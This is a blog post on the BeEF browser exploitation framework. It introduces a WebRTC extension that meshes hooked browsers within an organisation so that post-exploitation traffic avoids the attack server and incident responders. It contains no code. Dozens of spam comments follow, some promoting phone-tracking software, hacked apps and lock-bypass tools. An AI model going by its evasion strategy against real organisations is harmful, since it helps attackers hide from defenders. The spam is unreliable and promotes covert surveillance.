Tuesday, January 6, 2015

Hooked-Browser Meshed-Networks with WebRTC (Kiwicon 2014) - Part 1

Hi All, @xntrik here from sunny Australia. I hope you’ve all had a good New Year's and are ready to kick browser hacking into high gear for 2015. I had a thought that inspired me, and I wanted to share it here.

What if, to avoid tracking our post-exploitation communication back to our BeEF server, we were able to hook a bunch of browsers within an organisation, and make them talk to each other, instead of talking to our BeEF server? Perhaps we could keep one as the data channel (controlling peer)?

The answer is WebRTC. I recently had an amazing opportunity to present this at Kiwicon 2014, and I was keen to get the code into BeEF. This blog post provides a brief summary of WebRTC and how it works. Since there's quite a bit of ground to cover, this will be the first of a two part series.


Retaining post-exploitation communication with hooked-browsers is one of the more interesting issues with BeEF.

By default, BeEF uses XMLHttpRequest objects to poll to your BeEF server every 5 seconds. The logic is in the updater.js file of the core BeEF JavaScript client. It executes a setTimeout() function call that executes beef.updater.get_commands(), requesting the hook.js file from the BeEF server.

BeEF has options to use the WebSocket protocol as well, which shifts the comms from a polling mechanism to a more bi-directional streaming method of sending and receiving data between the server and browsers. Other more esoteric options are also being investigated, such as the use of DNS channels.

One of the issues with these methods is, all of your communication channels go back to the BeEF server. There are methods available to try and hide or obfuscate the presence of your BeEF server. But, most of these will still lead back to your BeEF Server eventually. For example, you could:

  • run multiple BeEF servers,
  • run servers with multiple interfaces, 
  • run multiple proxies pointing to your BeEF server, 
  • use reduced polling periods, 
  • use JavaScript obfuscation (which may help, but not much at the network layer), or  
  • use TLS encapsulation (similar issue, comms are still being sent to the BeEF server). 

If you're targeting a wide variety of targets, having things track back to your BeEF server may not matter so much.  If you're targeting a single organisation, though, this information is very useful to incident responders. If they detect one browser talking to your BeEF server, they'll very quickly spot the others. (This is still a big IF. As of today, no AV engines are detecting the stock-standard, un-obfuscated hook.js .. which is not altogether that surprising).

Virustotal report for stock hook.js
Thanks to those clever folks over at Google, Mozilla and Opera, we have an HTML5 technology to help us: WebRTC. WebRTC was initially intended to provide peer-to-peer communications for use-cases such as p2p video streaming. Due to bandwidth requirements, it's often better to provide video streaming between peers, instead of bouncing through servers. Another feature, apart from video streaming, is the provision of a data channel. This data channel works a little bit like WebSockets, in that it's event-driven and bi-directional. This is exactly the feature that we can use in BeEF to peer hooked browsers together.

The WebRTC Extension within BeEF is currently disabled by default. But, it's easy enough to enable. The extension provides the ability to have hooked browsers communicate with one another, using a single controlling peer as a data channel. The extension has been tested on Firefox 34.0.5 and Chrome 39.0.2171.95 (and Chrome on Android too!). In part two of this series, we’ll discuss some of the underlying JavaScript and how to use the extension.

49 comments:

  1. A good blog. Thanks for sharing the information. It is very useful for my future. keep sharing
    red ball 2 | duck life 2 | happy wheels | Red Ball | Red ball 3 | Flash Games| Tank trouble

    ReplyDelete
  2. Really very interesting post!!
    I hope title is the most attractive section of this particular post. I must read it. Sure I will book mark this content for the easy access of such an informative post.
    Essay writing company

    ReplyDelete
  3. Thanks for sharing your honest experience. When I first took a look at my head shots,
    I wasn’t too thrilled with mine but you’ve given me a new perspective!

    Virtual Edge

    ReplyDelete
  4. I as of late had an astonishing chance to present this at Kiwicon 2014, and I was quick termite company tucson az to get the code into BeEF. This blog entry gives a brief rundown of WebRTC and how it functions.

    ReplyDelete
  5. It was nice unblock game . Very informative and expressive .things are easily play online at
    Y8 game

    ReplyDelete
  6. This comment has been removed by the author.

    ReplyDelete
  7. Things are really changing, now get awesome content become easier. I used write my paper for me
    service for this last time. Pretty good service

    ReplyDelete
  8. It was nice unblock game . Very informative and expressive .things are easily play online at
    http://railbeeps.org

    ReplyDelete
  9. Take a closer look at this blog. It contains some information about phone tracking software that you can use to track someone you know

    ReplyDelete
  10. I would like to thank you for the efforts you have made in. The game is best known for its dark sense of humor and its graphic violence . I am hoping the arborists of long island same best work from you in the future as well. I really appreciate your work. Thanks for you agree for me.

    ReplyDelete
  11. I have read you post, Great work you really did it very well. Keep working like this and sharing informative posts like
    this one. keep it up. I'm waiting for your next post...
    what does it mean to refinance your mortgage

    ReplyDelete
  12. I have read you post, Great work you really did it very well. Keep working like this and sharing informative posts like
    this one. keep it up. I'm waiting for your next post...
    when to refinance your home

    ReplyDelete
  13. I have read you post, Great work you really did it very well. Keep working like this and sharing informative posts like
    this one. keep it up. I'm waiting for your next post...
    real estate agent

    ReplyDelete
  14. Great tips I have noted all in my diary I'll use your all tips as you mentioned I really like your article I was searching on this topic as I'm working on this topics too.you can see my work but yours is too good I personally appreciate you for this. Keep working like this.t shirt printing brampton

    ReplyDelete
  15. I got very excited to see these trendy looks. I think all those who are looking of latest trends will really enjoy reading your post. Please provide more information and photos. I am eagerly waiting for your updated post to get it.
    Coursework writing services

    ReplyDelete
  16. Hi, Great.. Tutorial is just awesome..It is really helpful for a newbie like me.. I am a regular follower of your blog.
    Really very informative post you shared here. Kindly keep blogging.
    If anyone wants to become a Front end developer learn from Javascript Online Training from India .
    or learn thru JavaScript Online Training from India.
    Nowadays JavaScript has tons of job opportunities on various vertical industry. ES6 Training in Chennai

    ReplyDelete
  17. dwgamez.com for best pc software you can get here

    ReplyDelete
  18. You always have creative content. Thanks for sharing. I love it and share with my friends. Keep it up bro.
    .
    .
    |
    |
    Download Call of Duty Zombies Mod APK Latest

    ReplyDelete
  19. Thanks for sharing such a great and informative post. I like this post and i would like to share with my friends. Keep it up bro.
    .
    .
    Tinder hacked matches

    ReplyDelete
  20. Hi there! This article could not be written any better! Reading through this post reminds me of my previous roommate! He continually kept preaching about this. I'll forward this post to him. Pretty sure he'll have a very good read. Thank you for sharing!

    Earn to Die 2 Mode apk

    ReplyDelete
  21. Stream authorization is a method to separate bot traffic from the human traffic. One of the most common of all is vidup.me/pair

    ReplyDelete
  22. Thank you to admin for sharing this with us here. This will help me out in my cv editor online and that is just the best thing for me right now. I love to read amazing things like this post here. Download hd cartoon apk

    ReplyDelete
  23. Amazing post I am glad thanks for sharing and I am sure you will check this so easy for everyone.
    asphalt 8 unlimited money
    pocket mortyrecipes
    mobdro
    custom binary blocked by frp lock

    ReplyDelete
  24. I have been checking out a few of your stories and I can state pretty good stuff. I will definitely bookmark your blog. Bloons TD Battles Cheats
    Which Ultimate Snapchat Hack Apk Download
    Download Need For Speed No Limits Mod Apk

    ReplyDelete
  25. Thanks for sharing such a spectacular post. I note you always posting a deep researchable post.
    Farmville 2 cheats bonus

    ReplyDelete
  26. Your article is awesome! How long does it take to complete this article? I have read through other blogs, but they are cumbersome and confusing. I hope you continue to have such quality articles to share with everyone! I believe there will be many people who share my views when they read this article from you!
    obat gabagen
    obat ginjal bengkak
    obat tbc kelenjar
    obat keloid
    obat kencing manis

    ReplyDelete
  27. the articles you present are very interesting and inspiring. i am very amazed good luck
    obat limpa bengkak
    obat thalasemia
    obat ginjal bengkak
    obat jantung bengkak
    obat keloid

    ReplyDelete
  28. I'd like to thank you for the efforts you have put in writing this blog. I'm hoping to check out the same high-grade blog posts by you in the future as well.
    fnaf world full version

    ReplyDelete
  29. Amazing site thaks a lot happy to see this beautiful design and will visit your site daily thanks<3
    Visit Also: asphalt 8 airborne mod apk

    ReplyDelete
  30. I as of late went over your site and have been perusing along. I thought I would leave my first remark. I don’t recognize what to say with the exception of that I have delighted in perusing. Decent blog, I will continue going by this online journal all the time. Happy New Year 2019 Quotes, Images Wallpapers, Wishes & Cards

    ReplyDelete
  31. Those who are searching over internet assignment help can contact with us now. We are the best assignment writing service provider in melbourne, Australia. Our Academic assignment writers available 24*7 hours for the students, if you really want to need assignment help online at cheapest price meet assignment helper at sample assignment and get high distinction grades.

    ReplyDelete
  32. You can take advantage of the “FRP bypass apk 2018” and everything else associated with it.
    google lock bypass

    ReplyDelete